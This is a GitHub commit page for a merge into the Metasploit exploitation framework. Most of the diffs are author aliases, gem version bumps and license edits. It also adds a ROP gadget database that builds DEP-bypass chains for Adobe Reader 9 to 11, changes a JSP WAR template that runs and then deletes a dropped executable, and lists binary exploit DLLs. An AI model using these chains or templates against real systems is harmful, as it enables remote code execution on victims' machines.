Skip to content

Commit dfe4e33

Browse files
BorjaMerinoBorjaMerino
committed
Merge pull request #4 from jvazquez-r7/review_2763
Update against upstream
2 parents 832b045 + d5e1967 commit dfe4e33

File tree

208 files changed

+13383
-4132
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

208 files changed

+13383
-4132
lines changed

.mailmap

Lines changed: 13 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <[email protected]>
22
dmaloney-r7 <dmaloney-r7@github> David Maloney <[email protected]>
33
dmaloney-r7 <dmaloney-r7@github> David Maloney <[email protected]> # aka TheLightCosine
44
ecarey-r7 <ecarey-r7@github> Erran Carey <[email protected]>
5+
farias-r7 <farias-r7@github> Fernando Arias <[email protected]>
56
hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
67
hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
78
jlee-r7 <jlee-r7@github> egypt <[email protected]> # aka egypt
@@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
1314
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
1415
limhoff-r7 <limhoff-r7@github> Luke Imhoff <[email protected]>
1516
shuckins-r7 <shuckins-r7@github> Samuel Huckins <[email protected]>
16-
tasos-r7 <tasos-r7@github> Tasos Laskos <[email protected]>
1717
todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
1818
todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
19+
todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
20+
trosen-r7 <trosen-r7@github> Trevor Rosen <[email protected]>
1921
wchen-r7 <wchen-r7@github> sinn3r <[email protected]> # aka sinn3r
2022
wchen-r7 <wchen-r7@github> sinn3r <[email protected]>
2123
wchen-r7 <wchen-r7@github> Wei Chen <[email protected]>
2224
wvu-r7 <wvu-r7@github> William Vu <[email protected]>
2325
wvu-r7 <wvu-r7@github> William Vu <[email protected]>
26+
wvu-r7 <wvu-r7@github> William Vu <[email protected]>
2427

2528
# Above this line are current Rapid7 employees. Below this paragraph are
2629
# volunteers, former employees, and potential Rapid7 employees who, at
@@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <[email protected]>
7275
OJ <oj@github> OJ <[email protected]>
7376
r3dy <r3dy@github> Royce Davis <[email protected]>
7477
r3dy <r3dy@github> Royce Davis <[email protected]>
78+
Rick Flores <[email protected]> Rick Flores (nanotechz9l) <[email protected]>
7579
rsmudge <rsmudge@github> Raphael Mudge <[email protected]> # Aka `butane
7680
schierlm <schierlm@github> Michael Schierl <[email protected]> # Aka mihi
7781
scriptjunkie <scriptjunkie@github> Matt Weeks <[email protected]>
7882
skape <skape@???> Matt Miller <[email protected]>
7983
spoonm <spoonm@github> Spoon M <[email protected]>
8084
swtornio <swtornio@github> Steve Tornio <[email protected]>
85+
Tasos Laskos <[email protected]> Tasos Laskos <[email protected]>
86+
TrustedSec <[email protected]> trustedsec <[email protected]>
87+
88+
# Aliases for utility author names. Since they're fake, typos abound
89+
90+
Tab Assassin <[email protected]> Tabasssassin <[email protected]>
91+
Tab Assassin <[email protected]> Tabassassin <[email protected]>
92+
Tab Assassin <[email protected]> TabAssassin <[email protected]>

Gemfile

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,8 @@ source 'https://rubygems.org'
22

33
# Need 3+ for ActiveSupport::Concern
44
gem 'activesupport', '>= 3.0.0'
5+
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
6+
gem 'bcrypt-ruby'
57
# Needed for some admin modules (scrutinizer_add_user.rb)
68
gem 'json'
79
# Needed by msfgui and other rpc components
@@ -17,7 +19,7 @@ group :db do
1719
# Needed for Msf::DbManager
1820
gem 'activerecord'
1921
# Database models shared between framework and Pro.
20-
gem 'metasploit_data_models', '~> 0.16.6'
22+
gem 'metasploit_data_models', '~> 0.16.9'
2123
# Needed for module caching in Mdm::ModuleDetails
2224
gem 'pg', '>= 0.11'
2325
end

Gemfile.lock

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,7 @@ GEM
1313
i18n (~> 0.6, >= 0.6.4)
1414
multi_json (~> 1.0)
1515
arel (3.0.2)
16+
bcrypt-ruby (3.1.2)
1617
builder (3.0.4)
1718
database_cleaner (1.1.1)
1819
diff-lcs (1.2.4)
@@ -21,7 +22,7 @@ GEM
2122
fivemat (1.2.1)
2223
i18n (0.6.5)
2324
json (1.8.0)
24-
metasploit_data_models (0.16.6)
25+
metasploit_data_models (0.16.9)
2526
activerecord (>= 3.2.13)
2627
activesupport
2728
pg
@@ -61,11 +62,12 @@ PLATFORMS
6162
DEPENDENCIES
6263
activerecord
6364
activesupport (>= 3.0.0)
65+
bcrypt-ruby
6466
database_cleaner
6567
factory_girl (>= 4.1.0)
6668
fivemat (= 1.2.1)
6769
json
68-
metasploit_data_models (~> 0.16.6)
70+
metasploit_data_models (~> 0.16.9)
6971
msgpack
7072
network_interface (~> 0.0.1)
7173
nokogiri

LICENSE

Lines changed: 2 additions & 85 deletions
Original file line numberDiff line numberDiff line change
@@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
4141
2007 H D Moore <hdm [at] metasploit.com>
4242
License: GPL-2 and Artistic
4343

44-
Files: external/source/meterpreter/ReflectiveDLLInjection/*
45-
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
44+
Files: external/source/ReflectiveDLLInjection/*
45+
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
4646
License: BSD-3-clause
4747

48-
Files: external/source/meterpreter/source/common/queue.h
49-
Copyright: 1991, 1993 The Regents of the University of California
50-
License: BSD-3-clause
51-
52-
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
53-
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
54-
License: Zlib
55-
56-
Files: external/source/meterpreter/source/bionic/libc/*
57-
Copyright: 2005-2008, The Android Open Source Project
58-
2004 by Internet Systems Consortium, Inc. ("ISC")
59-
1995,1996,1999 by Internet Software Consortium
60-
1995 by International Business Machines, Inc.
61-
1997,1998,1999,2004 The NetBSD Foundation, Inc.
62-
1993 Christopher G. Demetriou
63-
1983,1985,1989,1993 The Regents of the University of California
64-
2000 Ben Harris
65-
1995,1996,1997,1998 WIDE Project
66-
2003 Networks Associates Technology, Inc.
67-
1993 by Digital Equipment Corporation
68-
1997 Mark Brinicombe
69-
1993 Martin Birgmeier
70-
1993 by Sun Microsystems, Inc.
71-
1997, 2005 Todd C. Miller <[email protected]>
72-
1995, 1996 Carnegie-Mellon University
73-
2003 Networks Associates Technology, Inc.
74-
License: BSD-3-clause and BSD-4-clause
75-
76-
Files: external/source/meterpreter/source/bionic/libdl/*
77-
Copyright: 2007 The Android Open Source Project
78-
License: BSD-3-clause
79-
80-
Files: external/source/meterpreter/source/bionic/libm/*
81-
Copyright: 2003, Steven G. Kargl
82-
2003 Mike Barcroft <[email protected]>
83-
2002-2005 David Schultz <[email protected]>
84-
2004 Stefan Farfeleder
85-
2003 Dag-Erling Coïdan Smørgrav
86-
1996 The NetBSD Foundation, Inc.
87-
1985,1988,1991,1992,1993 The Regents of the University of California
88-
1993,94 Winning Strategies, Inc.
89-
1993, 2004 by Sun Microsystems, Inc.
90-
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
91-
92-
Files: external/source/meterpreter/source/extensions/espia/screen.c
93-
Copyright: 1994-2008, Mark Hammond
94-
License: BSD-2-clause
95-
96-
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
97-
Copyright: 2005 Vincent Liu
98-
License: GPL-2
99-
100-
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
101-
Copyright: 1994-2008, Mark Hammond
102-
License: BSD-2-clause
103-
104-
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
105-
Copyright: 2010, [email protected]
106-
License: BSD-2-clause
107-
108-
Files: external/source/meterpreter/source/pssdk/*
109-
Copyright: microOLAP
110-
License: N/A
111-
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
112-
SDK library embedded into the Meterpreter Sniffer extension. This
113-
source code is not distributed with Metasploit Framework.
114-
115-
Files: external/source/meterpreter/source/openssl/*
116-
Copyright: 1998-2002 The OpenSSL Project
117-
License: OpenSSL and SSLeay
118-
119-
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
120-
Copyright: 2003 Philippe Biondi <[email protected]>
121-
License: LGPL
122-
123-
Files: external/source/meterpreter/source/jpeg-8/*
124-
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
125-
License: BSD-3-clause
126-
127-
Files: external/source/meterpreter/source/libpcap/*
128-
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
129-
License: BSD-4-clause
130-
13148
Files: external/source/metsvc/*
13249
Copyright: 2007, Determina Inc.
13350
License: BSD-3-clause

data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll

76 KB
Binary file not shown.

data/ropdb/reader.xml

Lines changed: 132 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,132 @@
1+
<?xml version="1.0" encoding="ISO-8859-1"?>
2+
<db>
3+
4+
<rop>
5+
<compatibility>
6+
<target>9</target>
7+
</compatibility>
8+
9+
<gadgets base="0x4a800000">
10+
<gadget offset="0x2313d">pop ecx # ret</gadget>
11+
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
12+
<gadget offset="0x01f90">pop eax # ret</gadget>
13+
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
14+
<gadget offset="0x07e7d">call [eax] # ret</gadget>
15+
<gadget value="0xffffffff">HANDLE hFile</gadget>
16+
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
17+
<gadget value="0x00000040">DWORD flProtect</gadget>
18+
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
19+
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
20+
<gadget value="0x00000000">LPCTSTR lpName</gadget>
21+
<gadget offset="0x0155a">pop edi # ret</gadget>
22+
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
23+
<gadget offset="0x2d4de">pop ebx # ret</gadget>
24+
<gadget offset="0x01f90">pop eax # ret</gadget>
25+
<gadget offset="0x476aa">pop ecx # ret</gadget>
26+
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
27+
<gadget offset="0x44122">mov edx, ecx</gadget>
28+
<gadget offset="0x476aa">pop ecx # ret</gadget>
29+
<gadget offset="0x07e7d">call [eax] # ret</gadget>
30+
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
31+
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
32+
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
33+
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
34+
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
35+
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
36+
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
37+
<gadget offset="0x476ab">ret</gadget>
38+
<gadget value="junk">JUNK</gadget>
39+
<gadget value="0x00000400">memcpy length</gadget>
40+
<gadget value="junk">JUNK</gadget>
41+
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
42+
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
43+
</gadgets>
44+
</rop>
45+
46+
<rop>
47+
<compatibility>
48+
<target>10</target>
49+
</compatibility>
50+
51+
<gadgets base="0x4a800000">
52+
<gadget offset="0x26015">pop ecx # ret</gadget>
53+
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
54+
<gadget offset="0x2007d">pop eax # ret</gadget>
55+
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
56+
<gadget offset="0x246d5">call [eax] # ret</gadget>
57+
<gadget value="0xffffffff">HANDLE hFile</gadget>
58+
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
59+
<gadget value="0x00000040">DWORD flProtect</gadget>
60+
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
61+
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
62+
<gadget value="0x00000000">LPCTSTR lpName</gadget>
63+
<gadget offset="0x05016">pop edi # ret</gadget>
64+
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
65+
<gadget offset="0x14241">pop ebx # ret</gadget>
66+
<gadget offset="0x2007d">pop eax # ret</gadget>
67+
<gadget offset="0x26015">pop ecx # ret</gadget>
68+
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
69+
<gadget offset="0x4b49d">mov edx, ecx</gadget>
70+
<gadget offset="0x26015">pop ecx # ret</gadget>
71+
<gadget offset="0x246d5">call [eax] # ret</gadget>
72+
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
73+
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
74+
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
75+
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
76+
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
77+
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
78+
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
79+
<gadget offset="0x2a8df">ret</gadget>
80+
<gadget value="junk">JUNK</gadget>
81+
<gadget value="0x00000400">memcpy length</gadget>
82+
<gadget value="junk">JUNK</gadget>
83+
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
84+
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
85+
</gadgets>
86+
</rop>
87+
88+
<rop>
89+
<compatibility>
90+
<target>11</target>
91+
</compatibility>
92+
93+
<gadgets base="0x4a800000">
94+
<gadget offset="0x5822c">pop ecx # ret</gadget>
95+
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
96+
<gadget offset="0x5597f">pop eax # ret</gadget>
97+
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
98+
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
99+
<gadget value="0xffffffff">HANDLE hFile</gadget>
100+
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
101+
<gadget value="0x00000040">DWORD flProtect</gadget>
102+
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
103+
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
104+
<gadget value="0x00000000">LPCTSTR lpName</gadget>
105+
<gadget offset="0x55093">pop edi # ret</gadget>
106+
<gadget value="junk">JUNK</gadget>
107+
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
108+
<gadget offset="0x5597f">pop eax # ret</gadget>
109+
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
110+
<gadget value="junk">JUNK</gadget>
111+
<gadget offset="0x5822c">pop ecx # ret</gadget>
112+
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
113+
<gadget offset="0x5d4f8">pop edx # ret</gadget>
114+
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
115+
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
116+
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
117+
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
118+
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
119+
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
120+
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
121+
<gadget offset="0x505a0">memcpy address</gadget>
122+
<gadget offset="0x60bc4">call eax # ret</gadget>
123+
<gadget offset="0x505a0">memcpy address</gadget>
124+
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
125+
<gadget offset="0x463d0">pop ebx # ret</gadget>
126+
<gadget value="0x00000400">memcpy length</gadget>
127+
<gadget offset="0x5d4f8">pop edx # ret</gadget>
128+
<gadget offset="0x5d4f8">pop edx # ret</gadget>
129+
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
130+
</gadgets>
131+
</rop>
132+
</db>

data/templates/scripts/to_exe_jsp.war.template

Lines changed: 6 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -39,11 +39,13 @@
3939
if (%{var_proc}.waitFor() == 0) {
4040
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
4141
}
42-
42+
4343
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
44-
}
45-
else
44+
}
45+
else
4646
{
47-
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
47+
String[] %{var_exepatharray} = new String[1];
48+
%{var_exepatharray}[0] = %{var_exepath};
49+
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
4850
}
4951
%%>

data/vncdll.dll

-435 KB
Binary file not shown.

data/vncdll.x64.dll

-76.5 KB
Binary file not shown.

data/vncdll.x86.dll

393 KB
Binary file not shown.

0 commit comments

Comments
 (0)